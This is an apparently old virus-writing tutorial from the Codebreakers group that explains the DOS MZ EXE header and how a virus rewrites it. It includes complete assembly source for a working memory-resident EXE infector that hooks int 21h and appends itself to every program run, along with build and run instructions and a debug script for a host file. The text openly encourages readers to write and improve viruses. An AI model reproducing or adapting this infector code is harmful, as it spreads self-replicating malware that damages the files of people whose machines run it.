Lesson 4
Guide To EXE Infection
By Horny Toad

Now onto the 4th lesson, EXE file infection. Boy, the topics never seem to get any easier, do they? The difficult aspect of EXE infection is that there is no ONE technique to cover all forms of EXE infection. I will, therefore, keep to the basics in this tutorial and in later articles, address different techniques which you can use.

What is an EXE file?

One of the first things that we need to do is understand what an EXE file is and, more importantly, what it looks like. Quite simply, the EXE format is an improvement over the COM format in that it allows the program size to exceed one segment (64K). COM programs are limited to 64K, including the 256 bytes of the PSP. EXE files, on the other hand, can occupy a much larger space by using more than one segment. The practical limit on an EXE file's size is the amount of memory and hard drive space you have.

There are other characteristics that differ between the EXE and COM formats. In a COM file, the stack is automatically defined, whereas in an EXE file you need to define it yourself. The stack is probably the single most difficult concept to grasp when writing EXE files. Care must be taken that you define the stack large enough to handle all of the push and pop instructions that your program will use. If your stack is too small, your program is sure to crash.

The next difference between the two file formats is the initialization of the data segment. In a COM file, the data lives in an area within the code segment. Since a COM file only uses one segment anyway, the data, code, and stack segments can all fall right together. Very convenient, right? Well, in an EXE file, after the program loader puts the file in memory, both DS and ES contain the address of the PSP! Remember that! Always load the address of the data segment into DS when coding EXE files.

At the heart of the EXE file format lies the EXE header. The EXE header is a minimum of 32 bytes and describes a multitude of information about how the program needs to be loaded. I call the header the heart of the EXE file format because a virus that attacks EXE files needs to use practically all of the information in it. Therefore, pay attention so that you thoroughly understand this concept.

Let's take a look at the EXE header format:

The length of each element in the EXE header is 2 bytes (1 WORD). The descriptive names of the elements are the traditional names that have been used since the EXE file format was created. You can give them whatever symbolic names you want in your own code.

                           EXE Header Format

Offset          Length          Content         Description
-----------------------------------------------------------------------
0h              2               4Dh 5Ah         EXE file signature "MZ"
2h              2               PartPag         Bytes used in the last
                                                page (0 = full page)
4h              2               PagCnt          File length in 512-byte
                                                pages, header included
6h              2               ReloCnt         Number of entries in
                                                the relocation table
8h              2               HdrSize         Header length in
                                                paragraphs
0Ah             2               MinMem          Minimum extra memory
                                                needed, in paragraphs
0Ch             2               MaxMem          Maximum extra memory
                                                wanted, in paragraphs
0Eh             2               ReloSS          Segment correction for
                                                stack (SS)
10h             2               ExeSP           Value of stack pointer
                                                (SP)
12h             2               ChkSum          Checksum
14h             2               ExeIP           Value of instruction
                                                pointer (IP)
16h             2               ReloCS          Segment correction for
                                                CS
18h             2               TablOff         Offset of the first
                                                relocation entry
1Ah             2               Overlay         Overlay number

That looks very pretty, but how does it actually look? To tell you the truth, looking at the EXE header in DEBUG makes it so much simpler. The only catch is that you need to rename the extension to something other than ".EXE" in order to view the header; otherwise DEBUG loads the file as a program and the header is not shown. You can, if you know the exact location on disk, use the DEBUG L command to load a certain sector and then (D)isplay its contents. Nahh! Too complicated. Just rename the damn thing. Make sure that you have read Horny Toad & Opic's guide to disassembly and understand how to use DEBUG. I have included some sample files in this tutorial to give you some hands-on work with EXE files. One of the samples is a basic do-nothing EXE file. Let's say that I called this file someExe.exe and renamed it to someExe.eww. Below, I will display the contents of the someExe header.

At a prompt, type:

c:\>debug someExe.eww
-d

??:0100  4D 5A 11 00 02 00 01 00-20 00 11 00 FF FF 02 00  MZ...... .......
??:0110  00 01 00 00 00 00 00 00-3E 00 00 00 01 00 FB 71  ........>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00  jr..............
For an easier to read version of the same information, use SPo0ky's EXE header reader for the following results:
EXE Signature ........................................ MZ
Size of Last Page .................................... 0011
Number of 512 byte pages in file ..................... 0002
Number of Relocation Entries ......................... 0001
Header size in Paragraphs ............................ 0020
Minimum additional Memory required in paragraphs ..... 0011
Maximum additional Memory required in paragraphs ..... FFFF
Initial SS relative to start of file ................. 0002
Initial SP ........................................... 0100
Checksum (unused) .................................... 0000
Initial IP ........................................... 0000
Initial CS relative to start of file ................. 0000
Offset within Header of Relocation Table ............. 003E
Overlay Number ....................................... 0000

Relocation Table Entries:
        0000:0001
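
The same listing can be reproduced with a few lines of script. What follows is only a minimal sketch in Python (not the language of this tutorial, and not SPo0ky's reader): the function name parse_header and the FIELDS tuple are made up for illustration, and the bytes are the first 1Ch bytes of the DEBUG dump above.

```python
import struct

# First 1Ch (28) bytes of the sample header, copied from the DEBUG dump.
SAMPLE = bytes.fromhex(
    "4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 "
    "00 01 00 00 00 00 00 00 3E 00 00 00"
)

# Traditional field names, in file order (hypothetical helper tuple).
FIELDS = (
    "Signature", "PartPag", "PagCnt", "ReloCnt", "HdrSize", "MinMem",
    "MaxMem", "ReloSS", "ExeSP", "ChkSum", "ExeIP", "ReloCS",
    "TablOff", "Overlay",
)


def parse_header(raw):
    """Unpack the 14 little-endian words of an EXE header into a dict."""
    if len(raw) < 0x1C:
        raise ValueError("need at least 1Ch bytes of header")
    values = struct.unpack("<14H", raw[:0x1C])
    return dict(zip(FIELDS, values))


hdr = parse_header(SAMPLE)
for name in FIELDS:
    # The signature prints as 5A4D because the word is stored low byte first.
    print(f"{name:<10} {hdr[name]:04X}")
```

Every field is read as a little-endian word, which is why the bytes 4D 5A come back as the value 5A4Dh.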
However you choose to read the EXE header is fine. At this point, just make sure that you are aware of its existence. I have begun including the debug scripts of the programs that I use in the tutorial so that people who do not have access to the Codebreakers magazine can extract all of the sample programs from the tutorial with the help of debug. The debug usage differs slightly from the other tutorials, so make sure you read the instructions at the end of this file.

Now, let's take a look at the individual contents of the EXE header and identify their function in the infection process.

EXE signature

The first word in the header is the traditional EXE file signature "MZ". These are the initials of Mark Zbikowski, the programmer who designed the EXE file format. Obviously, you already know from my last tutorial that you can use this unique signature to identify whether or not the file is of the EXE format.

PartPag and PagCnt (need to be modified)

PartPag and PagCnt together give the entire file size, including the header. PagCnt, as the name implies, is the length of the file expressed in 512-byte pages, counting the last page even if it is only partly used. PartPag is the number of bytes on that last page, in other words the length of the file mod 512. Mod. You had better learn this concept now, because it will follow you on into higher programming languages such as C++.

5 % 2 = 1
5 / 2 = 2
The mod (%) is the remainder left over after integer division has taken place. Simple enough. PartPag and PagCnt will need to be modified to allow for the inclusion of your virus code.
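
To see how the two fields fit together, here is a small Python sketch that turns them back into a file size. The function name file_size is an assumption for illustration; the values come from the sample header shown earlier (PartPag = 0011h, PagCnt = 0002h).

```python
def file_size(part_pag, pag_cnt):
    """Rebuild the file length in bytes from PartPag and PagCnt."""
    if part_pag == 0:
        # A PartPag of zero means the last page is completely full.
        return pag_cnt * 512
    # All pages but the last are full; the last holds part_pag bytes.
    return (pag_cnt - 1) * 512 + part_pag


size = file_size(0x11, 0x02)
print(hex(size))            # length of the sample file in bytes

# Going the other way is just integer division and mod.
full_pages, remainder = divmod(size, 512)
print(full_pages, remainder)
```

For the sample this gives 211h bytes, the same number that the debug script at the end of this file loads into CX before writing the file.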

ReloCnt

The next item in the header represents the number of items in the relocation table. What the hell is a relocation table? A relocation table contains two words (offset,segment) for each element in the program that needs to be adjusted to account for segment location. You can skip over this because you will not have to make any modifications here but...

For each entry in the relocation table, the loader reads both words and adds the load segment (usually PSP segment + 10h) to the entry's segment. That sum, together with the entry's offset, gives the address in memory of a word that holds a segment value. The loader then adds the load segment to that word, so that the segment reference matches the place where the program actually landed in memory.
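
The loader's fix-up pass can be imitated on paper. The Python sketch below is only an illustration under stated assumptions: the names read_relocations and apply_relocations are invented, the load segment 1000h is an arbitrary example, and the header is rebuilt with zero padding around the three fields that matter here (ReloCnt, TablOff and the single table entry 0000:0001 of the sample program).

```python
import struct


def read_relocations(file_bytes):
    """Return the relocation entries as (offset, segment) pairs."""
    (relo_cnt,) = struct.unpack_from("<H", file_bytes, 0x06)
    (tabl_off,) = struct.unpack_from("<H", file_bytes, 0x18)
    return [
        struct.unpack_from("<HH", file_bytes, tabl_off + 4 * i)
        for i in range(relo_cnt)
    ]


def apply_relocations(image, relocs, load_seg):
    """Add load_seg to every word that a relocation entry points at."""
    fixed = bytearray(image)
    for offset, segment in relocs:
        pos = segment * 16 + offset          # position inside the image
        (value,) = struct.unpack_from("<H", fixed, pos)
        struct.pack_into("<H", fixed, pos, (value + load_seg) & 0xFFFF)
    return bytes(fixed)


# Simplified copy of the sample header: 200h bytes, mostly zero.
header = bytearray(0x200)
header[0:2] = b"MZ"
struct.pack_into("<H", header, 0x06, 1)        # ReloCnt
struct.pack_into("<H", header, 0x18, 0x3E)     # TablOff
struct.pack_into("<HH", header, 0x3E, 1, 0)    # entry: offset 1, segment 0

# The 17 bytes of program image from the sample file.
image = bytes.fromhex("B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 00")

relocs = read_relocations(bytes(header))
fixed = apply_relocations(image, relocs, load_seg=0x1000)
print(relocs)
print(fixed[:3].hex(" "))
```

In the sample, the one entry points at the operand of the first instruction (mov ax,0001h), so after the fix-up AX receives the real segment of the program's data rather than the link-time value.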

HdrSize

The next element of the header is the header size. Quite self explanatory, the HdrSize holds the size of the header in 16-byte paragraphs. With the information that you have thus far seen, you can determine the actual bare program size with the equation:

Size=((PagCnt*512)-(HdrSize*16))-(512-PartPag)
You will also not have to fool with the header size.
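
As a quick check of the equation, here it is as a Python sketch, run against the sample header (PagCnt = 2, PartPag = 11h, HdrSize = 20h). The function name image_size is made up for illustration, and the special case for PartPag = 0 is an addition: the equation as written assumes the last page is only partly filled.

```python
def image_size(pag_cnt, part_pag, hdr_size):
    """Bare program size in bytes: file size minus the header."""
    size = pag_cnt * 512 - hdr_size * 16
    if part_pag != 0:
        # Take away the unused tail of the last 512-byte page.
        size -= 512 - part_pag
    return size


print(image_size(0x02, 0x11, 0x20))
```

The result, 17 bytes, matches the length of the code at the very end of the sample file's debug script (offsets 0300h through 0310h).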

MinMem & MaxMem

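The next two items are just as self-explanatory: MinMem and MaxMem. They tell the loader how much memory, in paragraphs, to allocate beyond the program image itself. MinMem is the least the program needs in order to run, and MaxMem is the most it would like to have (FFFFh asks for everything available).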

ReloSS & ExeSP (need to be modified)

ReloSS and ExeSP are two items that need to be changed to account for the addition of code that you have just appended. ReloSS added with the starting segment address will give you your SS register.

Checksum (should be modified)

The Checksum item is the traditional place to store an infection marker.

ReloCS & ExeIP (need to be modified)

ReloCS is definitely an important item. The item stored here, along with the ExeIP, represents the beginning address to our virus code. This value will be initially saved from the host program so that it can be recalled and control returned back to the host.

TablOff

This is the offset to the first relocation element in the file.

Overlay

If this is the program main module, the value should be zero.

Below is a simple resident EXE infector. I choose to include a resident virus rather then a direct action infector, because I believe that, if you can write a resident EXE infector, making it non-resident would be a piece of cake. One thing that I was considering to do was to follow the modular style of coding that I used in the last tutorial. One trend that I was seeing in many viruses was that people were simply copying the code. After Slam #4 was released, you have no idea how many EXE infectors started to hit the scene that were essentially a word for word copy. Whatever. In the end, I decided to include the virus below so that you can see everything working in one virus, rather than the modular style of instruction. I am not sure which way is better, so I will probably continue to switch back and forth between styles. Another thing, while I am in the preaching mode, from now on, I will not be explaining the most basic concepts of assembly. If you have been following along with the tutorials, you should understand every concept that is in this tutorial. Really, the only new aspect that you need to be aware of with EXE infection is that you need to change certain values in the header to accomodate your virus. You already know how to do this. In the beginning tutorials, you played around with elements of the DTA. Well, you are going to be doing the same thing with the header, reading it into a buffer and reading and modifying the values that I have pointed out above.

.286
virus segment
  assume cs:virus, ds:virus, es:virus

 jumps
 org 0CBh

start:

  call delta                        ;Calculate delta offset
delta:
  pop bp
  sub bp,offset delta

  push ds                           ;save PSP address

  push cs cs
  pop ds es

  mov ax,0CBCBh                     ;our "Codebreaker" residency check
  int 21h                           ;>what is CB?
  cmp bx,0C001h                     ;>C001!! :o)
  je restore                        ;its already resident

  pop ds                            
  push ds                           ;PSP address back into DS
  ;--------------------------------------------------
  mov ax,ds                                 ;MCB residency
  dec ax                                    ;For further clarification
  mov ds,ax                                 ;read Codebreaker Tutorial 3

  sub word ptr ds:[3],40h
  sub word ptr ds:[12h],40h

  xor ax,ax
  mov ds,ax

  dec word ptr ds:[413h]

  mov ax,word ptr ds:[413h]
  shl ax,6

  mov es,ax

  push cs
  pop ds

  lea si,[bp+start]
  xor di,di
  mov cx,the_end - start
  rep movsb
  ;--------------------------------------------------
  xor ax,ax                                 ;Setting of interrupts
  mov ds,ax                                 ;For further clarification
                                            ;read Codebreaker Tutorial 3
  mov ax,es                                 
  mov bx,new_int21h-start
  cli
  xchg bx,word ptr ds:[21h*4]
  xchg ax,word ptr ds:[21h*4+2]
  mov word ptr es:[old_int21h-start],bx
  mov word ptr es:[old_int21h+2-start],ax
  sti
  ;--------------------------------------------------
  push cs cs
  pop ds es

  mov ah,9                                  ;Warns the poor shmuck
  lea dx,[bp+message]
  int 21h

restore:                                    ;Control handed back

  lea si,[bp+old_ip]                        ;Restore orig IP
  lea di,[bp+original_ip]
  mov cx,4
  rep movsw

; Now for a clarification of the next four lines. At the beginning of
; the virus DS contains the address of the PSP. We now restore the
; address from the stack, place the address in ES.  Then add 10h to
; skip over the PSP.  Skip over the PSP(100h) with 10h? Sounds a little
; fishy, right?  Well, remember that when you add 10h to AX, you are
; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP)

  pop ds
  mov ax,ds
  mov es,ax
  add ax,10h

  add word ptr cs:[bp+original_cs],ax       ;Orig CS
  cli
  add ax,word ptr cs:[bp+original_ss]       ;Orig SS
  mov ss,ax
  mov sp,word ptr cs:[bp+original_sp]       ;Orig SP
  sti

 db 0eah                                    ;jump to to it
 original_ip dw ?                           ;
 original_cs dw ?
 original_ss dw ?
 original_sp dw ?


 new_int21h:                                ;our int 21h handler
  pushf                                     ;push the flags
  cmp ax,0CBCBh                             ;residency check
  jne no_install_check
  mov bx,0C001h                             ;already resident
  popf                                      ;restore all flags
  iret                                      ;return
 no_install_check:
  cmp ah,4bh                                ;check if execute
  je infect
 return:
  popf                                      ;restore all flags
 db 0eah                                    ;jmp to orig int 21h
 old_int21h dd ?

 infect:
  pusha                                     ;only 286, saves all gen reg
  push ds
  push es

  call tsr_delta
 tsr_delta:
  pop bp                                    ;a tsr delta offset %-)
  sub bp,offset tsr_delta

  mov ax,3d02h                              ;open file in DS:DX
  int 21h
  jc exit

  xchg ax,bx                                ;file handle to bx

  push cs cs
  pop ds es

  mov ah,3fh                                ;Read the target header
  lea dx,[bp+header]                        ;into our buffer

  mov cx,1ch
  int 21h

  cmp word ptr cs:[bp+header],'ZM'          ;check if its an EXE
  je ok
  cmp word ptr cs:[bp+header],'MZ'
  je ok
  jmp close

 ok:
  cmp word ptr cs:[bp+header+12h],'BC'      ;Checksum value checked for
  je close                                  ;previous infection

  mov word ptr cs:[bp+header+12h],'BC'      ;Mark it as infected

  mov ax,word ptr cs:[bp+header+14h]        ;Save orig ExeIP
  mov word ptr cs:[bp+old_ip],ax            ;Store in our buffer
  mov ax,word ptr cs:[bp+header+16h]        ;Save orig ReloCS
  mov word ptr cs:[bp+old_cs],ax            
  mov ax,word ptr cs:[bp+header+0eh]        ;Save orig ReloSS
  mov word ptr cs:[bp+old_ss],ax
  mov ax,word ptr cs:[bp+header+10h]        ;Save orig ExeSP
  mov word ptr cs:[bp+old_sp],ax

  mov ax,4202h                              ;Set pointer to end of file
  xor cx,cx
  xor dx,dx
  int 21h

  push ax dx                                ;Save EOF results

                                            ;Calculate new CS:IP, we set
                                            ;it to the EOF (this is where
                                            ;we will attach our virus)

  mov cx,16                                 ;Convert filesize into 16 byte
  div cx                                    ;paragraphs

  sub ax,word ptr cs:[bp+header+8]          ;Substract Header size from
                                            ;filesize to get the image
                                            ;(code/data) size.

                                            ;save:
  mov word ptr cs:[bp+header+14h],dx        ;New ExeIP
  mov word ptr cs:[bp+header+16h],ax        ;New ReloCS

  pop dx ax                                 ;restore saved filesize

  add ax,the_end - start                    ;Add virus size to file size
  adc dx,0                                  ;Adds carry to DX

  mov cx,512                                ;Calculate amount of pages
  div cx

  cmp dx,0
  je no_remainder
  inc ax                                    ;if remainder, add 1
 no_remainder:

  mov word ptr cs:[bp+header+4],ax          ;New PageCnt
  mov word ptr cs:[bp+header+2],dx          ;New PartPag

  mov ah,40h                                ;write the virus to the EOF
  lea dx,[bp+start]
  mov cx,the_end - start
  int 21h

  mov ax,4200h                              ;Send pointer to beginning
  xor cx,cx
  xor dx,dx
  int 21h

  mov ah,40h                                ;Write the new header
  lea dx,[bp+header]
  mov cx,1ch
  int 21h

mov al,7
int 29h                                     ; just a BEEEEEPPP

 close:
  mov ah,3eh                                ;close file
  int 21h

 exit:
  pop es
  pop ds
  popa
  jmp return


 old_ip dw offset exit_prog
 old_cs dw 0
 old_ss dw 0
 old_sp dw 0fffeh

 header db 1ch dup(?)                       ;Buffer for header

 message db 10,13,10,13
 db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13
 db '- has been installed in your computers memory and will from now on infect any -',10,13
 db '- EXE file that you execute.                                                  -',10,13
 db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus.              -',10,13,10,13
 db '                           - www.codebreakers.org -',10,13,'$'

 the_end:

 exit_prog:
  mov ax,4c00h                              ;Request terminate program
  int 21h
 
virus ends
end start
In order to see the above virus work. Cut the virus out of this file and save it in a file exevir.asm.

At a prompt with TASM/TLINK in the same directory, type:

c:\>tasm exevir.asm
c:\>tlink exevir.obj
Use the myexe.exe (below) as the host program. With both of the programs in the same directory, execute the virus, then execute the host program. If you look at the filesize using the (dir)ectory command, you will see that it has increased in length. Test this virus in a MSDOS box from windows and when you exit out of the MSDOS box, the virus will be gone. If you check the header now, you will be able to see the changes made after infection. Take a look at that beautiful "CB" infection marker.
??:0100  4D 5A 5A 01 03 00 01 00-20 00 11 00 FF FF 02 00   MZZ..... .......
??:0110  00 01 43 42 01 00 01 00-3E 00 00 00 01 00 FB 71   ..CB....>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00   jr..............
To write the definitive guide to all forms of EXE infection, I would need to quit my day job (which I've thought of doing) and just write a book. In the end it is better to have a bunch of installments attacking each issue and facet of virus writing. Look for the future Codebreaker tutorials become much more specific and advanced. If you can understand how to infect COM and EXE files, along with what role encryption and polymorphism can aid in virus effectivness, you are well on you way to making some really awesome creations. The only thing that you need to add from here is some boot infection techniques to the virus and watch out, you'll have a decent multipartide virus. I guess my one piece of advice now is to read code and absorb it. Start to become critical of others code and use that knowledge and judgement to develope your own style. Enough preaching!

Have fun!
Good luck!

Horny Toad


SAMPLE PROGRAMS USED IN TUTORIAL

In order to extract this sample program, cut it out of this file and paste it into a file named "myexe.txt".

At the prompt, type:

c:\>debug < myexe.txt
c:\>rename myexe.exd myexe.exe
You will then have a sample infectable EXE file.
N MYEXE.EXD
E 0100 4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 
E 0110 00 01 00 00 00 00 00 00 3E 00 00 00 01 00 FB 71 
E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 
E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0300 B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 
E 0310 00 
RCX
0211
W
Q